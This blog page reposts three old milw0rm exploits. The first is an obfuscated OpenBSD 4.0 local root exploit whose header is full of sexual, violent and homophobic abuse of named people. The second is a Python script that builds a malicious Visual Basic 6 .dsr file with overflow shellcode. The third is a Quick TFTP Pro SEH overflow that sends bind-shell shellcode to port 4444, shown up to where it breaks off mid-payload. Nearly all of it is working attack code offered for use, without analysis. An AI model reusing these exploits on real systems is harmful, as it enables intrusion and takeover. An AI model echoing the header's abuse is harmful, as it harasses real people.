飘零的代码 piao2010 ’s blog

/* *      [ A PRODUCTION OF LUL-DISLCOSURE INC. ] *                         PROUDLY PRESENTS... * *                                     888                    888  *                                     888                    888  *                                     888                    888  *  .d88b.  88888b.   .d88b.  88888b.  88888b.  .d8888b   .d88888  * d88""88b 888 "88b d8P  Y8b 888 "88b 888 "88b 88K      d88" 888  * 888  888 888  888 88888888 888  888 888  888 "Y8888b. 888  888  * Y88..88P 888 d88P Y8b.     888  888 888 d88P      X88 Y88b 888  *  "Y88P"  88888P"   "Y8888  888  888 88888P"   88888P'  "Y88888  *          888                                                    *          888                                                    *          888                      DID YOU EVER FEEL THE RUSH... *                     d8b d8b              ...FOR JIZZ?      *                     Y8P Y8P *                                                *                    8888 888 88888888 88888888  *                    "888 888    d88P     d88P   *                     888 888   d88P     d88P    *                     888 888  d88P     d88P     *                     888 888 88888888 88888888  *                     888                        *                    d88P                        *                  888P" * * My final contribution, DA WORLD'S FIRST ANIMATED EXPLOIT!, is the foundation * for the next generation of OpenBSD exploits, crafted to burn Theo's eyes and make * him spend countless hours not only exercising his supreme reversing skills * but also delay his already deadly slow patch release timing. Hopefully every * fucktard out there willing to release an exploit for one of the many OpenBSD * locally exploitable issues, will give this insanely advanced code a good use. * Make sure you include some sanity checks (ie. if uid == 0 and hostname == * cvs.openbsd.org make it do something creative like updating their index.html * once in a while). * * I would like to thank the following people for all the support, fun and * inspiration during my pilgrimage through the incredibly broken community known * as the security industry: *      Jesus H. Christ, Brute Dong, Bob, GOBBLES, towlie, noir and spender. * * I could name several people that I would love to either curbstomp or rape * anally (enjoying every inch of their rectum, though many of them would enjoy * the experience too, i know you dig dicks guys!), but I'll be a nice kid and * simply say that I love how this hdm, jf, FAilja, et al are nothing but * cock monglers. I enjoy how some of them have lost their jobs or got banned * by US immigration. And I also thank McDonalds for making you fatfucks get more * obese and ugly every year. And I'm sorry for the poor strippers that have to * stand the reality of being the only thing ressembling a woman you've ever had * the opportunity to see naked, besides your crack head cock-gobbling mom when * she sodomized you with a chop stick (and we know you liked it). * Hehehehe. BANANA! BANANA! BANANA! BTW, has gadi evron stopped crying for cocks * on craigslist men seeking men board? That fat fuck is sick. LULZ! * * OpenBSD is obsolete, aged, poorly designed, worsly developed and horribly * maintained. And led by a guy who needs to take his head out of his frozen * Canadian ass. FUCK YOU THEO, I'VE GOT YOUR DARPA FUNDING! * * This exploit abuses an old bug to gain root privileges on an OpenBSD 4.0 * system. The ipv6 bug was never fully implemented because this shit made * me get a brain tumor. FUCK YOU THEO! LULZ LULZ LULZ LULZ LULZ LULZ LULZ * *  -- 2008 - by LMH * */#include /*pax*/<string.h>/*drepper libc rocking on*//**//**//**//**//**//*   */#include /*It seems to me so strange*/<stdlib.h>/*tax*//**//**//**//**//**//* */#include /*aint*/<stdio.h>/*mmap NULL rocking the kernel on*//**//**//**//**//**/#include /*Check wallet for her name*/<unistd.h>/*lax!*//**//**//**//**//**//**/#include /*Her face is in the muck*/<sys/param.h>/**//**//**//**//**//**//* * */#include /*Her face is in the muck*/<err.h>/**//**//**//**//**//**//**//**//* */#include /*I think her zippers stuck*/<sys/ioctl.h>/*death    OPENBSD SECURE  */#include /*It is perfect for me*/<sys/syscall.h>/*threats    THANKS TO PAX    */#include /*To practice surgery*/<fcntl.h>/**//**//*  #########   BUY   */#include /*One look coagulates*/<sys/types.h>/*mail ##horror##    ### SPENDER */#include /*Its time to operate*/<sys/stat.h>/*arrives #sick###    ### A NEW   */#include /*Just keep it going*/<sys/mman.h>/*pain ###pain#####    ### POSTER! */#include /*Just keep it going*/<sys/sysctl.h>/*feels ##dumb###    ############*/#define /*Just keep it going*/ma main/*theo: ##feels########## ance M  #######*/#define /*Shes not dead, shes gonna live*/s /*fuck*/stdout/*##   Havok #######*/#define /*Shes not dead, shes gonna live*/x fflush/*the ######################*/#define /*I see her eyes rolling back in her head*/_s /*pain*/sleep/* GG NOIR */#define /*Come on lets take her home*/f for/**//**//**//**//**//**//**//**//* */#define /*I think i heard her groan*/v /*what*/void/**//**//**//**//**//**//* */#define /*Hold on or she will sink*/__0 while/**//**//**//**//**//**//**//*   */#define /*Just keep it going*/_c /*is*/char/*acter issues*//**//**//**//**//* */#define /*You can fake it*/_____ sizeof/**//**//**//**//**//**//*  *//**//*   */#define /*It's time to operate*/____ /*the*/printf/**//**//**//**//**//**//*  */#define /*It's time to operate*/___ return/**//**//**//**//**//**//*  *//**//**/#define /*It's time to operate*/__ /*of*/int/**//**//**//**//**//**//**//**//**/#define /*It's time to operate*/_t static/**//**//**//**//**//**//**//**//*   */#define /*It's time to operate*/_ki struct kinfo_proc/**//**//**//**//**//*   */#define /*It's time to operate*/_pi pid_t/**//**//**//**//**//**//*   *//**//**/#define /*It's time to operate*/______ unsigned int/**//**//**//**//**//**//* */#define /*It's time to operate*/_______ err/**//**//**//**//**//**//*  *//*   */#define /*It's time to operate*/__ki exit/**//**//**//**//**//**//*  *//**//* */#define /*It's time to operate*/__sy sysctl/**//**//**//**//**//**//*  *//*   */#define /*Heroin winner cup.*/ctkrn (__)0x00000000/**//**//**//**//**//**//*  */#define /*It's time to operate*/kproc (__)0x0000000E/**//**//**//**//**//**//**/#define /*Inject. Overdose. End.*/kppid (__)(/**/ctkrn+/**/0x00000001)/**//*  */#define /*That cigar tube smells like lost elections*/dirtysanchez mmap/**//* */#define /*It's time to operate*/________/**/printf/**//**//**//**//**//**//*  */#define /*It's time to operate*/_________/**/unsigned long/**//**//**//**//*  */#define /*It's time to operate*/_m/**/memcpy/**//**//**//**//**//**//**//*    */#define /*It's time to operate*/__________/**/setuid/**//**//**//**//**//**//**/#define /*It's time to operate*/___________/**/seteuid/**//**//**//**//**//*  */#define /*It's time to operate*/____________/**/execl/**//**//**//**//**//*   */#define aaaaaaaaaaaaaaaa O_RDWR#define ____rw_c_ (aaaaaaaaaaaaaaaa|O_CREAT)#define ____se_e_ (S_IRUSR|S_IWUSR)#define reopen close#define _w_w_w_w_w_w_w_w write#define meltwax  PROT_READ|PROT_EXEC#define raadt MAP_FIXED#define openbsdsec MAP_FAILED#define molest syscall#define provos SYS_ioctl_c macaddr[]=""; // Used for ICMPv6 exploit: VMWare network interface mac addr/* many years... *Theo sheds a FREE tear* Sigh.===================================================================RCS file: /usr/OpenBSD/cvs/www/index.html,vretrieving revision 1.548retrieving revision 1.549diff -u -r1.548 -r1.549--- www/index.html 2007/03/12 17:21:59 1.548+++ www/index.html 2007/03/13 22:39:47 1.549@@ -78,7 +78,7 @@  <a href="art1.html"><img border="0" src="images/puffy40.gif" height=199 <br> <center><strong><font color="#e00000">-Only one remote hole in the default install, in more than 10 years!<br>+Only two remote holes in the default install, in more than 10 years!<br> </font></strong></center> <p> The OpenBSD project produces a <b>FREE</b>, multi-platform 4.4BSD-based*/_c shlr[]="\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9""\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\x39\\xde\\xd1\\xd1\\xd1\\xa9\\x87\\xe5\\xc3\\x2f\\x1b\\x7c"//"\\x0f\\x7c\\x0f\\x3e\\x6f\\x41\\x41\\x41\\x8e\\x5a\\xde\\x5a\\x88\\xc1\\xe0\\x11\\x58\\x92\\xd5"//"\\x5a\\xc2\\x58\\x93\\xd5\\x69\\x80\\x96\\x99\\x01\\x2e\\x31\\xd1"; double obsdv;_________//mg1=0x21524110;_________ mg2=0xcc99e897;_________ mg3=0xffffffff;_________ mg4=0x12345678;_c shl[]="\\x85\\xc8\\xc3\\xc4\\x85\\xd9\\xc2\\xaa";v gpr(_pi dp,_ki *kp);///_c tks[]="\\x6e\\x35\\x2c\\x31\\x6e\\x35\\x29\\x24\\x2e\\x6f\\x19\\x19\\x19\\x19\\x19\\x41";_cgde[]="\\x00\\x4b\\x4a\\x59\\x00\\x5b\\x5b\\x56\\x6c\\x1f\\x2f";_t v evi(){_________ rts[2]={0xee5f9be,0xebdfc46};__ i,moo,moooo;v *p;_________ppa;_ki kp;rts[0]=rts[0]^(mg1^mg3);rts[1]=rts[1]^(mg2^mg4);gpr((_pi)getpid(),//&kp);ppa=(_________)kp.kp_eproc.e_paddr;shlr[24+5]=ppa&0xff;shlr[24+6]=(ppa>>8)&0xff;shlr[24+7]=(ppa>>16)&0xff;shlr[24+8]=(ppa>>24)&0xff;____("\\x5b\\x2b\\x5d\\x20""\\x53\\x68\\x65\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x3a\\x20""%u bytes at %p\\x0a",(unsigned)//_____(shlr),&shlr);moo=mkstemp(tks);if(moo<0){_______(1,"\\x6f\\x70\\x65\\x6e");}_w_w_w_w_w_w_w_w(moo,shlr,_____(shlr));if((lseek(moo,0L,SEEK_SET))<0){_______(1,"\\x6c\\x73\\x65\\x65\\x6b");}p=dirtysanchez(0,_____(shlr),meltwax,raadt,moo,0);if(p==openbsdsec){_______(1,"\\x6d\\x6d\\x61\\x70");}moooo=open(gde,O_RDWR);if(moooo<0){munmap(p,_____(shlr));reopen(moo);_______(1,"\\x6f\\x70\\x65\\x6e");}molest(provos,moooo,0x80044103,NULL);reopen(moooo);reopen(moo);___________(0);__________(ctkrn);____________(shl,"sh",(v *)ctkrn);}double vobsd(){__ rg[2],l;_c *p;double re;rg[0]=CTL_KERN;rg[1]=KERN_OSRELEASE;if(__sy(rg,2,NULL,(size_t *)&l,NULL,0)==-1){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");}if((p=malloc(l))==NULL){_______(1,NULL);}if(__sy(rg,2,p,(size_t *)&l,NULL,0)==-1){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");}re=atof(p);____("\\x5b\\x2b\\x5d\\x20""\\x4f\\x70\\x65\\x6e\\x42\\x53\\x44\\x20\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x20\\x64\\x65\\x74""\\x65\\x63\\x74\\x65\\x64\\x3a\\x20""%s (%f)\\n",p,re);free(p);___ re;}v uss(){____(/**/"\\x4f\\x70\\x65\\x6e\\x42\\x53\\x44\\x3a\\x20\\x4f\\x6e\\x6c\\x79\\x20\\x73\\x65\\x63\\x75\\x72\\x65""\\x20\\x69\\x6e\\x20\\x73\\x69\\x6e\\x67\\x6c\\x65\\x20\\x75\\x73\\x65\\x72\\x20\\x65\\x6e\\x76\\x69""\\x72\\x6f\\x6e\\x6d\\x65\\x6e\\x74\\x73\\x20\\x66\\x6f\\x72\\x20\\x6d\\x6f\\x72\\x65\\x20\\x74\\x68""\\x61\\x6e\\x20\\x31\\x30\\x20\\x79\\x65\\x61\\x72\\x73\\x21\\x0a\\x0a\\x54\\x61\\x72\\x67\\x65\\x74""\\x20\\x76\\x75\\x6c\\x6e\\x65\\x72\\x61\\x62\\x69\\x6c\\x69\\x74\\x79\\x3a\\x0a\\x09\\x76\\x67\\x61""\\x3a\\x20\\x76\\x67\\x61\\x5f\\x69\\x6f\\x63\\x74\\x6c\\x28\\x29\\x20\\x6c\\x6f\\x63\\x61\\x6c\\x20""\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x20\\x20\\x28\\x34\\x2e\\x30\\x20\\x61\\x6e\\x64\\x20\\x33""\\x2e\\x39\\x20\\x67\\x65\\x6e\\x65\\x72\\x69\\x63\\x20\\x69\\x33\\x38\\x36\\x29\\x0a\\x09\\x69\\x70""\\x36\\x34\\x30\\x3a\\x20\\x49\\x43\\x4d\\x50\\x76\\x36\\x20\\x72\\x65\\x6d\\x6f\\x74\\x65\\x20\\x65""\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x20\\x20\\x20\\x20\\x28\\x34\\x2e\\x30\\x20\\x67\\x65\\x6e\\x65""\\x72\\x69\\x63\\x20\\x69\\x33\\x38\\x36\\x29\\x20\\x28\\x72\\x6f\\x6f\\x74\\x20\\x72\\x65\\x71\\x75""\\x69\\x72\\x65\\x64\\x21\\x29\\x0a\\x0a\\x44\\x61\\x72\\x65\\x20\\x79\\x6f\\x75\\x20\\x74\\x6f\\x20""\\x72\\x75\\x6e\\x20\\x74\\x68\\x69\\x73\\x20\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x61\\x73\\x20""\\x72\\x6f\\x6f\\x74\\x2e\\x20\\x4f\\x70\\x65\\x6e\\x42\\x53\\x0a\\x0a");__ki(-1);}v gpr(_pi dp,_ki *kp){__ rg[4],l;rg[0]=ctkrn;rg[1]=kproc;rg[2]=kppid;rg[3]=dp;l=_____(_ki);if(__sy(rg,4,kp,(size_t *)&l,NULL,0)<0){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");_______(1,"\\x43\\x6f\\x75\\x6c\\x64\\x20\\x6e\\x6f\\x74\\x20\\x72\\x65\\x74\\x72\\x69\\x65\\x76\\x65\\x20""\\x70\\x72\\x6f\\x63\\x20\\x73\\x74\\x72\\x75\\x63\\x74\\x75\\x72\\x65\\x21\\x0a");}}_t v xo(_cu[],______ l,__ k){______ i;f(i=0;i<l;i++){u[i]=u[i]^k;}}_t __ was=0;v pg(__ w,_c*rr[],__ nz,__ wsn){__ i,b;_c *u=0;__0(was<wsn){f(i= 0;i<nz;i++){u=rr[i];f(b=0;b<w;b++){____("\\b");}____("%s",u);x(s);_s(1);}was++;}____("\\n"/*A*/);/*{*/}/*r},v*/__ ma(__ a,_c **g){_c *theosmovie[]={"\\x53\\x75\\x63\\x6b\\x69\\x6e\\x67"/**//**//**/"\\x20\\x6f\\x6e\\x20\\x6d\\x79\\x20\\x74\\x69\\x74\\x74\\x69\\x65\\x73\\x20\\x6c\\x69\\x6b\\x65\\x20""\\x79\\x6f\\x75\\x20\\x77\\x61\\x6e\\x74\\x65\\x64\\x20\\x6d\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20","\\x43\\x61\\x6c\\x6c\\x69\\x6e\\x67\\x20\\x6d\\x65\\x2c\\x20\\x61\\x6c\\x6c""\\x20\\x74\\x68\\x65\\x20\\x74\\x69\\x6d\\x65\\x20\\x6c\\x69\\x6b\\x65\\x20\\x42\\x6c\\x6f\\x6e\\x64""\\x69\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x43\\x68\\x65""\\x63\\x6b\\x20\\x6f\\x75\\x74\\x20\\x6d\\x79\\x20\\x63\\x68\\x72\\x69\\x73\\x73\\x79\\x20\\x62\\x65""\\x68\\x69\\x6e\\x64\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x49\\x74\\x27\\x73\\x20\\x66\\x69\\x6e\\x65\\x20\\x61""\\x6c\\x6c\\x20\\x6f\\x66\\x20\\x74\\x68\\x65\\x20\\x74\\x69\\x6d\\x65\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x4c\\x69\\x6b\\x65\\x20\\x73\\x65\\x78\\x20\\x6f\\x6e\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x61\\x63""\\x68\\x65\\x73\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x57\\x68\\x61\\x74\\x20\\x65\\x6c\\x73""\\x65\\x20\\x69\\x73\\x20\\x69\\x6e\\x20\\x74\\x68\\x65\\x20\\x74\\x65\\x61\\x63\\x68\\x65\\x73\\x20""\\x6f\\x66\\x20\\x70\\x65\\x61\\x63\\x68\\x65\\x73\\x3f\\x20\\x48\\x75\\x68\\x3f\\x20\\x57\\x68\\x61""\\x74\\x3f\\x20","\\x48\\x75\\x68\\x3f\\x20\\x52\\x69\\x67\\x68\\x74\\x2e\\x20\\x57\\x68\\x61\\x74""\\x3f\\x20\\x55\\x68\\x68\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x48\\x75\\x68\\x3f""\\x20\\x52\\x69\\x67\\x68\\x74\\x2e\\x20\\x57\\x68\\x61\\x74\\x3f\\x20\\x55\\x68\\x68\\x3f\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x53\\x49\\x53\\x20\\x49\\x55\\x44\\x2c\\x20\\x73\\x74\\x61""\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75\\x73\\x65\\x20\\x69""\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x49\\x55\\x44\\x20\\x53\\x49\\x53\\x2c\\x20\\x73\\x74\\x61\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68""\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75\\x73\\x65\\x20\\x69\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20""\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x53\\x49\\x53\\x20\\x49\\x55\\x44\\x2c""\\x20\\x73\\x74\\x61\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75""\\x73\\x65\\x20\\x69\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20""\\x20\\x20\\x20","Fuck the pain away? Fuck the pain away!\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the pain away! Fuck the pain away?\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the 0day away. Fuck the pain away!""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the pain away! Fuck the"" pain away?\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the 0day aw""ay? Fuck the pain away!\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20"};____("\\033[2J\\x20\\x20\\x5f\\x5f\\x5f\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x70\\x65\\x6e\\x42\\x53""\\x44\\x20\\x4d\\x6f\\x76\\x69\\x65\\x20\\x62\\x79\\x20\\x54\\x68\\x65\\x6f\\x20\\x64\\x65\\x20\\x52""\\x61\\x61\\x64\\x74\\x0a\\x20\\x2f\\x2f\\x20\\x20\\x37\\x20\\x20\\x20\\x20\\x20\\x20\\x53\\x74\\x61""\\x72\\x72\\x69\\x6e\\x67\\x2e\\x2e\\x2e\\x0a\\x28\\x5f\\x2c\\x5f\\x2f\\x5c\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2e\\x2e\\x2e\\x68\\x69\\x6d\\x73\\x65\\x6c\\x66\\x21\\x0a""\\x20\\x5c\\x20\\x20\\x20\\x20\\x5c\\x0a\\x20\\x20\\x5c\\x20\\x20\\x20\\x20\\x5c\\x20\\x20\\x20\\x20""\\x20\\x42\\x72\\x6f\\x75\\x67\\x68\\x74\\x20\\x74\\x6f\\x20\\x79\\x6f\\x75\\x20\\x62\\x79\\x2e\\x2e""\\x2e\\x0a\\x20\\x20\\x5f\\x5c\\x20\\x20\\x20\\x20\\x5c\\x5f\\x5f\\x0a\\x20\\x28\\x20\\x20\\x5c\\x20""\\x20\\x20\\x20\\x20\\x20\\x29\\x20\\x20\\x20\\x20\\x20\\x54\\x68\\x65\\x6f\\x27\\x73\\x20\\x6c\\x6f""\\x73\\x74\\x20\\x44\\x41\\x52\\x50\\x41\\x20\\x66\\x75\\x6e\\x64\\x69\\x6e\\x67\\x0a\\x20\\x20\\x5c""\\x5f\\x5f\\x5f\\x5c\\x5f\\x5f\\x5f\\x2f\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x26""\\x20\\x50\\x65\\x61\\x63\\x68\\x65\\x73\\x2e\\x0a\\x0a");/* Fuck the 0day away. */ if(a<2){uss();}obsdv=vobsd();pg(80,theosmovie,_____(theosmovie)/_____(_c *),1);xo(shl,_____(shl),shl[_____(shl)]);xo(shlr,_____(shlr),0xd1);xo(tks,_____(tks),0x41);xo(gde,_____(gde), 0x2f);if(obsdv==4.0&&!strcmp(g[1],"vga")){evi();}/*That's it.*/___ 0;}/*Easy to fingerprint, eh?*/// milw0rm.com [2008-07-01]

#usage: exploit.pyprint "-----------------------------------------------------------------------"print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\\n'print " author: shinnai"print " mail: shinnai[at]autistici[dot]org"print " site: http://shinnai.altervista.org\\n"print " Once you create the file, open it with Visual Basic 6 and click on"print " command name."print "-----------------------------------------------------------------------"buff = "A" * 555get_EIP = "\\xFF\\xBE\\x3F\\x7E" #call ESP from user32.dllnop = "\\x90" * 12shellcode = (    "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"    "\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"    "\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"    "\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"    "\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34"    "\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47"    "\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x41\\x4b\\x38"    "\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48"    "\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c"    "\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e"    "\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x52\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58"    "\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x30\\x4b\\x44"    "\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x51\\x4b\\x38"    "\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33"    "\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x33\\x45\\x38\\x42\\x4c\\x4a\\x47"    "\\x4e\\x30\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58\\x42\\x47\\x4e\\x41\\x4d\\x4a"    "\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b"    "\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x4a\\x56\\x4e\\x43\\x4f\\x55\\x41\\x33"    "\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37"    "\\x42\\x55\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x35\\x4a\\x36\\x4a\\x59"    "\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56"    "\\x4e\\x46\\x43\\x56\\x50\\x32\\x45\\x46\\x4a\\x37\\x45\\x36\\x42\\x50\\x5a"    )dsrfile = (    "VERSION 5.00\\n"    "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\\n"    "   ClientHeight    =   6315\\n"    "   ClientLeft      =   0\\n"    "   ClientTop       =   0\\n"    "   ClientWidth     =   7980\\n"    "   _ExtentX        =   14076\\n"    "   _ExtentY        =   11139\\n"    "   FolderFlags     =   1\\n"    '   TypeLibGuid     =   "{D7133993-3B5A-4667-B63B-749EF16A1840}"\\n'    '   TypeInfoGuid    =   "{050E7898-66AC-4150-A213-47C7725D7E7E}"\\n'    "   TypeInfoCookie  =   0\\n"    "   Version         =   4\\n"    "   NumConnections  =   1\\n"    "   BeginProperty Connection1\\n"    '      ConnectionName  =   "Connection1"\\n'    "      ConnDispId      =   1001\\n"    "      SourceOfData    =   3\\n"    '      ConnectionSource=   ""\\n'    "      Expanded        =   -1  'True\\n"    "      QuoteChar       =   96\\n"    "      SeparatorChar   =   46\\n"    "   EndProperty\\n"    "   NumRecordsets   =   1\\n"    "   BeginProperty Recordset1\\n"    '      CommandName     =   "Command1"\\n'    "      CommDispId      =   1002\\n"    "      RsDispId        =   1003\\n"    '      CommandText     =   "' + buff + get_EIP + nop + shellcode + nop + '"\\n'    '      ActiveConnectionName=   "Connection1"\\n'    "      CommandType     =   2\\n"    "      dbObjectType    =   1\\n"    "      Locktype        =   3\\n"    "      IsRSReturning   =   -1  'True\\n"    "      NumFields       =   1\\n"    "      BeginProperty Field1\\n"    "         Precision       =   10\\n"    "         Size            =   4\\n"    "         Scale           =   0\\n"    "         Type            =   3\\n"    '         Name            =   "ID"\\n'    '         Caption         =   "ID"\\n'    "      EndProperty\\n"    "      NumGroups       =   0\\n"    "      ParamCount      =   0\\n"    "      RelationCount   =   0\\n"    "      AggregateCount  =   0\\n"    "   EndProperty\\n"    "End\\n"    'Attribute VB_Name = "DataEnvironment1"\\n'    "Attribute VB_GlobalNameSpace = False\\n"    "Attribute VB_Creatable = True\\n"    "Attribute VB_PredeclaredId = True\\n"    "Attribute VB_Exposed = False\\n"    )try:    out_file = open("DataEnvironment1.dsr",'w')    out_file.write(dsrfile)    out_file.close()    print "\\nFILE CREATION COMPLETED!\\n"except:    print " \\n -------------------------------------"    print "  Usage: exploit.py"    print " -------------------------------------"    print "\\nAN ERROR OCCURS DURING FILE CREATION!"# milw0rm.com [2008-04-04]

#!/usr/bin/python# Quick TFTP Pro 2.1 SEH Overflow (0day)# Tested on Windows XP SP2. # Coded by Mati Aharoni# muts..at..offensive-security.com# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt########################################################## bt ~ # quickftp.py# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)# [*] http://www.offensive-security.com# [*] Sending evil packet, ph33r# [*] Check port 4444 for bindshell# bt ~ # nc -v 172.16.167.130 4444# (UNKNOWN) [172.16.167.130] 4444 (krb524) open# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\\Documents and Settings\\Administrator>##########################################################import socketimport sysprint "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"print "[*] http://www.offensive-security.com"host = '172.16.167.134'port = 69try:   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:   print "socket() failed"   sys.exit(1)filename = "pwnd"# windows/shell_bind_tcp - 317 bytes# http://www.metasploit.com# EXITFUNC=thread, LPORT=4444shell=("\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b""\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01""\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07""\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f""\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b""\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c""\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff""\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0""\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08""\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53""\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66""\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\